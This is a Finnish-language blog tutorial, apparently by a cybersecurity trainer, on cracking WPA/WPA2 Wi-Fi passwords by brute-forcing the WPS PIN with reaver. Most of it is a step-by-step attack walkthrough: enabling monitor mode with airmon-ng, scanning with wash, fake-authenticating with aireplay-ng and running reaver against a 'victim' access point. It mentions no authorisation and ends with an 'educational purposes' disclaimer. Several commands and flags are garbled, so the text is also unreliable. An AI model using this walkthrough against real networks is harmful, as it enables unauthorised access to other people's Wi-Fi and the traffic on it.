Me kaikki tiedämme, että suurin osa ihmisistä laittaa langattomaan yhteyteen mieluiten wifi-salasanan. Tämä voi olla niinkin yksinkertainen kuin 12345 tai niinkin monimutkainen kuin useiden kirjainten,numeroiden ja merkkien yhdistelmä. No, tässä on huonoja uutisia, on olemassa työkalu nimeltä reaver, jota voidaan käyttää WAP/WAP2 WiFi-salasanan murtamiseen.
Tietoa WEP:stä, WAP:stä ja WAP2:sta
WEP:n (Wired Equivalent Privacy, langallinen vastaava yksityisyydensuoja) toimintojen parantamiseksi luotiin vuonna 2003 WiFi Protected Access eli WPA. Tämän väliaikaisen parannuksen tietoturva on edelleen suhteellisen heikko, mutta se on helpompi konfiguroida. WPA käyttää TKIP-protokollaa (Temporal Key Integrity Protocol) turvallisempaan salaukseen kuin WEP tarjosi.
Vuotta myöhemmin, vuonna 2004, WiFi Protected Access 2 tuli saataville. WPA2:ssa on vahvempi suojaus ja se on helpompi konfiguroida kuin aiemmat vaihtoehdot. Tärkein ero WPA2:ssa on se, että se käyttää TKIP:n sijasta Advanced Encryption Standardia (AES).
Mitä tarvitset.
- WiFi-adapteri, joka tukee monitoritilaa
- Tietokone, jossa on WiFi
- Lähistöllä oleva WPA-suojattu WiFi-verkko
- Reaver asennettuna
- Pysyvyys
Edellytys on, että reitittimesi on konfiguroitu siten, että se ei ole käyttänyt Push-painikkeella tapahtuvaa tunnistusta.(PBC)
Tehdään näin
Aluksi, jos käytät virtuaalikonetta, sinun on otettava USB-ohjain käyttöön menemällä asetuksiin, napsauttamalla sitten USB ja valitsemalla USB-laite.
NB: Varmista, että käyttämäsi langaton sovitin tukee monitoritilaa.
Sen jälkeen suorita seuraava komento:
iwconfig
Tämä komento näyttää vain langattomat liitännät
Suorita:
sudo ifconfig wlan0 down
Tämä poistaa WiFi:n käytöstä
Sitten:
sudo airmon-ng check kill
Tämä komento tappaa kaikki prosessit, jotka voisivat häiritä liittymäni käyttöä monitoritilassa. Se tappaa verkonhallinnan, jotta internet ei ole käytössä.
Sitten suorita:
iwconfig wlan0 mode monitor
Tällä komennolla vaihdetaan tila hallitusta tilasta monitoritilaan.
Hallittu tila on kaikkien langattomien laitteiden oletustila.
Syy siihen, miksi meidän on muutettava tila hallitusta tilasta monitor-tilaan, on se, että emme halua kaapata vain niitä paketteja, joilla on laitteemme mac-osoite, vaan kaikki paketit, myös reitittimeen ja muihin laitteisiin lähetetyt paketit. Tämä on mahdollista vain, kun WiFi-sovitin on monitor-tilassa.
Sitten suorita:
sudo ifconfig wlan0 up
Tämä tuo wifin takaisin toimintaan.
Sitten suorita:
iwconfig
Tässä tarkistetaan, että tilamme on vaihtunut managed-tilasta monitor-tilaan. Jos näin tapahtui, sen pitäisi näkyä terminaalissa.
Alhaalla olevassa kuvassa näkyy, että tila muuttui monitoriksi.
wash - interface wlan0
Tässä näkyvät kaikki langatonta käyttöliittymää käyttävät WPS-toiminnolla aktivoidut Apsit.
Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0
Mac ID:tä varten avaa uusi välilehti ja kirjoita ifconfig. Kopioi ensimmäiset 12 numeroa unspec:stä wlan0:een.
Ei vielä ENTERiä.
Avaa toinen uusi välilehti.
Varmista, että reaver on asennettu. Jos sinulla ei ole, suorita seuraava komento.
Sudo apt-get install aircrack-ng reaver
Tämä asentaa reaverin.
Reaver raa’asti pakottaa pinin ja yhdistää sen kohteeseen, kun se on saanut pinin, se käyttää sitä varsinaisen WAP/WAP2-avaimen laskemiseen.
Sitten suorita seuraava komento:
Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate
Paina enteriä tällä välilehdellä ja paina enteriä myös sillä toisella välilehdellä, jota käskin olla painamatta.
Tämän pitäisi kestää pari minuuttia, koska se kokeilee kaikkia mahdollisia yhdistelmiä, ja lopulta se antaa sinulle WPS-pinin, WAP-salasanan ja Wi-Fi-
Nimen. Tämä artikkeli on tarkoitettu oppimistarkoituksiin, emme ole vastuussa mistään vahingosta, joka aiheutuu siihen viitattaessa.
Artikkeli on kirjoittanut Restercuter Nyawira, SheHacks KE:n jäsen, kouluttaja ja kyberturvallisuuden harrastaja. Löydät hänet LinkedInistä (Restercuter Nyawira) ja Twitteristä @Restercuter1.